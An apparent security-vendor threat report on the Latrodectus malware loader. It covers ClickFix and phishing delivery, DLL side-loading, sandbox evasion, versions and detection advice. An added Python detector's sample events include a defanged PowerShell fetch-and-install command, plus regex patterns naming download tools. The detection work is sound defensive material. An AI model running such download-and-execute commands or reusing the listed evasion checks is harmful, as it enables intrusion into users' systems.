Latrodectus (also tracked as BlackWidow or Unidentified 111) is a Windows malware loader first discovered in October 2023, developed as the successor to IcedID (BokBot). Distributed primarily by the threat actors TA577 and TA578, it has rapidly evolved through nine versions, infected an estimated 44,000+ systems, and survived two rounds of the international Operation Endgame takedown.
Overview & Origins
Latrodectus emerged as IcedID's operational infrastructure was being wound down. Code analysis by Proofpoint and Team Cymru revealed shared developer lineage between IcedID and Latrodectus, with overlapping infrastructure and coding conventions suggesting the same development team pivoted to the new project.
Latrodectus shares critical code patterns with IcedID including similar C2 protocol structures, string obfuscation methods, and campaign ID encoding. The transition from IcedID to Latrodectus began in late 2023 as IcedID's backend was deprecated.
- Primary function: Malware loader/downloader that delivers secondary payloads (ransomware, stealers, Cobalt Strike)
- Language: C/C++ compiled as DLL; delivered via JavaScript, MSI, or ISO chains
- Distributors: TA577 (high-volume threat distributor) and TA578 (contact form/legal threat campaigns)
- Geography: Targets primarily North America, Western Europe, and Australia
Distribution & the ClickFix Technique
Traditional Delivery
- Phishing emails: Thread-hijacked replies with malicious PDF/HTML attachments T1566.001
- JavaScript chains: Obfuscated JS files download MSI packages containing Latrodectus DLLs T1059.007
- Contact form abuse: TA578 uses corporate website contact forms to send fake legal threats with malicious links T1189
ClickFix Social Engineering (2025)
In early 2025, Latrodectus campaigns adopted the ClickFix technique — displaying fake browser error pages that instruct victims to copy and paste a PowerShell command into their terminal. This bypasses traditional email attachment detection entirely.
- Fake error page: Victim visits compromised or impersonated website showing a browser update or CAPTCHA error
- Clipboard payload: Page copies a PowerShell one-liner to the user's clipboard T1059.001
- User execution: Instructions guide user to open Run dialog (Win+R) and paste the command T1204.002
- Payload chain: PowerShell downloads and executes MSI installer containing Latrodectus DLL
Technical Analysis
Execution Chain
- Stage 1: JavaScript or MSI installer drops legitimate executable + malicious DLL
- Stage 2: DLL side-loading via legitimate signed binary (e.g., nvidia.exe, winword.exe) T1574.002
- Stage 3: Latrodectus DLL loaded into memory, decrypts configuration, contacts C2
- Stage 4: C2 delivers secondary payloads based on victim profiling
String Obfuscation
Starting with version 1.4, Latrodectus uses AES-256 CTR mode for string encryption, replacing the earlier XOR-based obfuscation. Each encrypted string has a unique key and IV, making static analysis significantly more difficult. T1027
C2 Protocol
- HTTPS POST requests to hardcoded or dynamically generated C2 domains T1071.001
- Campaign ID: Encoded in the binary to track distribution campaigns
- Bot ID: Generated from hardware identifiers (HWID) for unique victim tracking
- Commands: Download/execute PE, download/execute DLL, execute shellcode, self-update, self-delete
Sandbox Evasion
Latrodectus employs one of the most aggressive sandbox evasion suites observed in modern loaders, checking for 75+ processes associated with analysis environments before executing its payload.
- Process enumeration: Checks for 75+ analysis/debugging tools (x64dbg, Wireshark, ProcessHacker, etc.) T1057
- MAC address validation: Compares against known VM MAC prefixes (VMware, VirtualBox, Hyper-V) T1497.001
- CPU core check: Requires minimum core count to proceed (sandboxes often have 1-2 cores)
- Memory check: Requires minimum RAM threshold
- Desktop file count: Checks for minimum number of files on desktop (real users have clutter)
- Timing checks: Uses GetTickCount and NtDelayExecution to detect time acceleration T1497.003
Version Evolution
| Version | Date | Key Changes |
|---|---|---|
| 1.0 | Oct 2023 | Initial release; XOR string obfuscation; basic loader functionality |
| 1.1 | Dec 2023 | Added self-deletion capability; improved C2 protocol |
| 1.2 | Feb 2024 | DLL side-loading delivery; enhanced sandbox checks |
| 1.3 | Apr 2024 | Scheduled task persistence; improved evasion |
| 1.4 | Jul 2024 | AES-256 CTR string encryption; 75+ process blacklist |
| 1.5-1.7 | Sep-Nov 2024 | Post-Endgame infrastructure rebuild; new C2 domains |
| 1.8-1.9 | Jan-Feb 2025 | ClickFix distribution; improved DGA fallback; updated evasion |
MITRE ATT&CK Mapping
| Tactic | Technique | Usage |
|---|---|---|
| Initial Access | T1566.001 Phishing Attachment | JS/HTML/PDF email attachments |
| Execution | T1204.002 Malicious File | User executes JS or MSI installer |
| Execution | T1059.001 PowerShell | ClickFix PowerShell clipboard payloads |
| Persistence | T1053.005 Scheduled Task | Scheduled task for recurring execution |
| Defense Evasion | T1574.002 DLL Side-Loading | Loads via legitimate signed executables |
| Defense Evasion | T1027 Obfuscated Files | AES-256 CTR string encryption |
| Defense Evasion | T1497.001 System Checks | VM/sandbox detection (75+ processes) |
| Discovery | T1057 Process Discovery | Enumerates running processes for analysis tools |
| C2 | T1071.001 Web Protocols | HTTPS POST to C2 servers |
| C2 | T1105 Ingress Tool Transfer | Downloads secondary payloads |
Operation Endgame
Latrodectus was targeted in both phases of Operation Endgame — the initial May 2024 takedown and a follow-up action. Despite infrastructure disruption, the malware's operators rebuilt C2 infrastructure within weeks and continued operations.
- May 2024 (Round 1): Multiple C2 servers seized; temporary disruption to distribution campaigns
- Recovery: New C2 domains registered; version 1.5 deployed with updated infrastructure
- Late 2024 (Round 2): Additional infrastructure targeted; operators adapted again
- 2025: Latrodectus remains fully operational with ClickFix delivery and version 1.9
Detection & Defense
- DLL side-loading detection: Monitor for legitimate executables loading unsigned DLLs from unexpected paths
- PowerShell monitoring: Alert on clipboard-pasted PowerShell commands from Run dialog (ClickFix indicator)
- MSI installation tracking: Log and alert on MSI installations from temp/download directories
- Process creation chains: Detect JS → msiexec → rundll32 execution chains
- Network indicators: Monitor for HTTPS POST patterns to recently registered domains with low reputation
- YARA rules: Available from Proofpoint, Elastic Security, and Team Cymru
- User training: Educate staff about ClickFix attacks — legitimate sites never ask users to paste commands
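The process-chain, MSI and ClickFix indicators listed above, implemented as a small detector over constructed Sysmon-style process-creation events. This is an added example, not Mjolnir Security's tooling; the event field names, the sample events (with a defanged placeholder URL) and the heuristic that a Run-dialog launch appears as PowerShell parented by explorer.exe are assumptions.

```python
import re
# Constructed Sysmon-style process-creation events (not real telemetry); URL is a defanged placeholder.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\Downloads\invoice.js"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Users\u\AppData\Local\Temp\setup.msi /qn"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\u\AppData\Roaming\cache\helper.dll,run"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -c "iwr hxxp://placeholder.invalid/u.msi -OutFile u.msi; msiexec /i u.msi"'},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
]
USER_PATH = re.compile(r"\\(Users|Temp|AppData|Downloads)\\", re.I)  # user-writable locations
DOWNLOAD = re.compile(r"\b(iwr|Invoke-WebRequest|DownloadString|DownloadFile|curl|wget)\b", re.I)
JS_CHAIN = (["wscript.exe", "msiexec.exe", "rundll32.exe"], ["cscript.exe", "msiexec.exe", "rundll32.exe"])

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestry(events, pid):
    """Image basenames from the root ancestor down to pid, e.g. [explorer.exe, wscript.exe, ...]."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]

def detect(events):
    """Map each pid to the list of rule names it trips (empty list when nothing matched)."""
    hits = {}
    for e in events:
        name, cmd, rules = basename(e["image"]), e["cmd"], []
        chain = ancestry(events, e["pid"])
        # Rule 1: the JS -> msiexec -> rundll32 execution chain (Stages 1 and 2 above)
        if chain[-3:] in JS_CHAIN:
            rules.append("js_msiexec_rundll32_chain")
        # Rule 2: rundll32 loading a DLL from a user-writable path (side-loaded loader DLL)
        if name == "rundll32.exe" and ".dll" in cmd.lower() and USER_PATH.search(cmd):
            rules.append("rundll32_dll_from_user_path")
        # Rule 3: MSI installed from temp/download directories
        if name == "msiexec.exe" and re.search(r"/i\s", cmd, re.I) and USER_PATH.search(cmd):
            rules.append("msi_from_temp_or_downloads")
        # Rule 4: ClickFix indicator; assumes a Run-dialog launch shows explorer.exe as the parent
        if name == "powershell.exe" and chain[-2:-1] == ["explorer.exe"] and DOWNLOAD.search(cmd):
            rules.append("clickfix_explorer_powershell_download")
        hits[e["pid"]] = rules
    return hits
```

Rule 4 will also fire on a user who legitimately runs a download cmdlet from the Run dialog, so in production it is a triage signal to pair with the MSI and side-loading rules rather than a standalone block.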
Defend Against Advanced Loader Threats
Mjolnir Security provides detection and response capabilities against Latrodectus, IcedID successors, and emerging loader families.
- Loader & Dropper Detection: Behavioral detection of DLL side-loading chains, ClickFix execution patterns, and Latrodectus sandbox evasion techniques within your environment.
- Phishing Campaign Analysis: Proactive analysis of thread-hijacked emails, contact form abuse campaigns, and social engineering techniques targeting your organization.
- 24/7 Incident Response: Rapid containment when loader activity is detected, before ransomware is deployed. Call +1 833 403 5875.